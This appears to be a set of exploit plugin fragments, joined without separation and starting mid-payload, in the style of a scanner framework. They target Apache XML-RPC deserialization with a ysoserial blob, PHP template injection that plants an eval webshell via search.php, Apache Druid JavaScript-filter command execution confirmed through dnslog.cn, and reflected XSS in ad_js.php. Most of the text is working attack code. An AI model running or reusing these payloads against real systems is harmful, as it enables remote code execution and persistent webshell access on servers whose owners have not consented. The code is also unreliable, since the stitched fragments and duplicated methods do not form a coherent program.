OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14' #input your payload encoded by ysoserial
pocxml = '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">' + payload + '</serializable></value></member></struct></value></param></params></methodCall>'
try:
r2 = requests.post(url=pocurl,
headers=headers,
data=pocxml,
verify=False)
if r2.status_code == 200 and 'XML-RPC' in r2.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = r2.text
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _attack(self):
result = {}
random_string = random_str(16)
verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'<?php @eval($_POST[sma11stu]);?>" + random_string + "')&func=assert"
veri_url = urljoin(self.url, '/search.php')
shell_url = urljoin(self.url, '/' + random_string + '.php')
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
resp = requests.post(veri_url,data=verify_payload,headers=headers)
time.sleep(1)
resp_1 = requests.get(shell_url,headers=headers)
if (random_string in resp_1.text) and resp_1.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php')
result['VerifyInfo']['Shell_pass'] = "******"
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
getres_url = 'http://www.dnslog.cn/getrecords.php'
dnsheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
}
dnssess = requests.session()
#获取dnslog的subdomain
try:
dnsreq = dnssess.get(url=getdnssub_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
except Exception as e:
logger.warn(str(e))
#执行ping dnslog的请求
pocurl = self.url + '/druid/indexer/v1/sampler?for=filter'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
payload = 'ping catchyou.' + dnsreq.text
pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
time.sleep(5)
except Exception as e:
logger.warn(str(e))
#检查dnslog日志
try:
dnsres = dnssess.get(url=getres_url,
headers=dnsheaders,
allow_redirects=False,
verify=False,
timeout=10)
if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = dnsres.text
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
xss_payload = "<script>alert()</script>"
verify_payload = "ad_js.php?ad_id=" + xss_payload
logger.warn(verify_payload)
veri_url = urljoin(self.url,verify_payload)
logger.warn(veri_url)
headers = {
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
resp = requests.get(veri_url,headers=headers)
if xss_payload in resp.text and resp.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
